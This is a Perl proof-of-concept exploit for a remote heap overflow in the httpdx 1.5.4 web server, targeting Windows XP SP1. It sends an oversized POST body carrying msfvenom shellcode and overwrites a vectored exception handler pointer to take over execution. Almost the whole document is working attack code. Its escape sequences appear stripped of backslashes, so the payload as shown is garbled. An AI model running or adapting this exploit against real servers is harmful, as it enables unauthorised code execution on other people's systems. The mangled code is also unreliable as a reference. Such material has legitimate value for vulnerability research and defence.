# Title : httpdx <= 1.5.4 Remote Heap Overflow
# Published : 2012-07-29
# Author :
#!/usr/bin/perl -w
#======================================================================
# Exploit Title: httpdx <= 1.5.4 Remote Heap Overflow
# Date: 28 July 2012
# Exploit Author: st3n [at sign] funoverip [dot] net
# Vendor Homepage: http://httpdx.sourceforge.net
# Download link: http://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.4/httpdx1.5.4.zip/download
# Version: 1.5.4
# Tested on: WinXP SP1
#======================================================================
# Additional notes:
# -----------------
#
# - During a POST request, httpdx allocates memory with malloc(size+1),
# where 'size' is actually the value of the "Content-Length" HTTP header.
# All post-data will then be copied into this area using strncpy(x,y,size2),
# where 'size2' = "request length" - "header length" (and not Content-Length)
#
# - As httpdx uses its own handler function upon a crash, this exploit overwrites
# the first _VECTORED_EXCEPTION_NODE structure with a pointer to our shellcode.
#
# - The exploit works very often, but not always. In either case, httpdx crashes
# after the exploit.
#
# - WinXP SP1
# 0x77ED73B4 --> UnhandledExceptionFilter()
#======================================================================
use strict;
use IO::Socket::INET;
# Flat script: open one TCP connection to $host:80, send a single POST
# whose body is longer than the Content-Length it advertises (the
# malloc/strncpy mismatch described in the header notes), then echo
# whatever the server sends back.  Everything below is hard-coded for
# the one target/platform named in the header; there is no argument
# parsing and no input validation.
# target
my $host = "127.0.0.1";
# The [perl|php|py|..] page to call during the POST request.
# The page must exist and the extension must be defined in the directive
# "http.handlers = {...}" in httpdx.conf
my $page = "/test.pl";
# Windows XP - SP1 - English
# ---------------------------
# Both addresses are platform-specific constants taken from the header
# notes; they are only meaningful for the WinXP SP1 build listed there.
# ptr to the first _VECTORED_EXCEPTION_NODE structure = 0x77fc3210 - 4
my $veh_node_addr = 0x77fc320c ;
# pointer to our shellcode => 0x00227664 - 8 = 0x0022765c
my $sc_ptr = 0x0022765c;
# shellcode
# (msfvenom -p windows/exec -f perl CMD=calc.exe)
# Payload string as published; its length drives the padding computed below.
my $shellcode =
"xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52" .
"x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26" .
"x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0d" .
"x01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0" .
"x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8b" .
"x58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xff" .
"x31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7d" .
"xf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8b" .
"x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44" .
"x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8b" .
"x12xebx86x5dx6ax01x8dx85xb9x00x00x00x50x68" .
"x31x8bx6fx87xffxd5xbbxf0xb5xa2x56x68xa6x95" .
"xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbb" .
"x47x13x72x6fx6ax00x53xffxd5x63x61x6cx63x2e" .
"x65x78x65x00";
# flush after every write
$| = 1;
# NOTE(review): the constructor result is not checked.  IO::Socket::INET->new
# returns undef when the connection fails, and the print below would then
# warn about an undefined filehandle instead of reporting the real error.
my $sock = IO::Socket::INET->new("$host:80");
# One request, built as a single string.  The Content-Length header claims
# 1023 bytes, but the body that follows is the shellcode, padding up to the
# author's 1032-byte figure, and then two packed 32-bit little-endian
# values (pack 'V') -- i.e. longer than advertised.  That header/body
# length mismatch on a POST to a handler-script URL is the observable
# characteristic of this request on the wire.
print $sock "POST $page HTTP/1.0rn" .
"Content-Length: 1023rn" .
"Content-Type: textrn" .
"Host: $host" . "rn" .
"rn" .
# shellcode
$shellcode .
# nops
"x90" x (1032-length($shellcode)) .
# VEH addr
pack('V', $veh_node_addr) .
# ptr to shellcode
pack('V', $sc_ptr)
;
# if any ...
# Echo whatever comes back.  Per the header notes the server is expected to
# crash, so this loop usually ends on EOF with little or no output.
while(<$sock>){
print $_;
}
exit;